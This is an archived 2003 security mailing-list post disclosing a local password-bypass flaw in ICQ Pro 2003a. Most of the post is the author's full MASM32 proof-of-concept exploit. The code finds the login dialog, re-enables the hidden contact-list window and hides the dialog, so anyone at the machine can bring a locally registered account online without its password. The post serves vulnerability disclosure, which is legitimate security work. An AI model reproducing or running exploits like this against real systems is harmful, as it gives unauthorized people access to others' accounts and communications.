ICQ 2003a Password Bypass

From: Cauу (mourapradoat_private)
Date: Sat Jul 05 2003 - 06:30:23 PDT

  • Next message: Gadgeteer: "Re: Email marketing company gives out questionable security advice" 

    
 ('binary' encoding is not supported, stored as-is)
Software: ICQ 2003a
Threat: Login password can be bypassed locally

I have found a vulnerability in ICQ Pro 2003a that 
allows anyone to connect to ICQ server using any 
account registered locally regardless the 'save 
password' option is checked or not. High level 
security password is also bypassed!

How it works?
Simple! You may use EnableWindow API to enable ICQ 
contact list window. After enabling the window you can 
set your status to online and the UIN will be 
connected no matter how high is your security level.

I've coded a proof-of-concept exploit in July, 02 when 
I found the vuln. 
The exploit is provided "As is" without warranties. 
To compile it you will need MASM32.

; ллллллллллллллллллллллллллллллллллллллллллллллллллллл
лллллллллллллллллллл
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT 
HERE - CUT HERE      BOF 
; -----------------------------------------------------
--------------------
;
;  07/02/2003 - ca1-icq.asm 
;  ICQ Password Bypass exploit.
;  written by Cauу Moura Prado (aka ca1)
;  mourapradoat_private - ICQ 373313
; 
;  This exploit allows you to login to ICQ server 
using any account registered *locally*
;  no matter the 'save password' option is checked or 
not. High level security is also bypassed. 
;  All you have to do is run the exploit and set 
status property using your mouse when the flower
;  is yellow. If you accidentally set status to 
offline then you will need to restart ICQ and run 
;  the exploit again. Greets to: Alex Demchenko(aka 
Coban), my cousin Rhenan for testing the exploit 
;  on his machine and that tiny Israeli company for 
starting the whole thing. Oh sure.. hehehe
;  I can't forget...  many kisses to those 3 chicks 
from my building for being so hot!! ;)
;
; 
;        uh-oh!
;         ___     
;      __/   \__  
;     /  \___/  \        Vulnerable:
;     \__/+ +\__/          ICQ Pro 2003a Build #3800
;     /   ~~~   \
;     \__/   \__/        Not Vulnerable:
;        \___/             ICQ Lite alpha Build 1211
;                          ICQ 2001b and ICQ 2002a 
;    tHe Flaw Power        All other versions were not 
tested.                       
;                                                      
                           coded with masm32
; 
_______________________________________________________
________________________exploit born in .br
        
.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0 
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
 invoke FindWindow, addr szClassName, addr szTextHigh
 mov hWndLogin, eax  
 .if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow
   mov hWndLogin, eax
 .endif 
 invoke GetParent, hWndLogin 
 invoke EnableWindow, eax, 1      ;Enable ICQ contact 
list
 invoke ShowWindow, hWndLogin, 0  ;get rid of Login 
screen (don't kill this window)
 invoke ExitProcess, 0            ;uhuu.. cya! i gotta 
sleep!
end _entrypoint

; ллллллллллллллллллллллллллллллллллллллллллллллллллллл
лллллллллллллллллллл
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT 
HERE - CUT HERE      EOF 
; -----------------------------------------------------
--------------------

    

    



    

    


This archive was generated by hypermail 2b30 
: Mon Jul 07 2003 - 13:51:37 PDT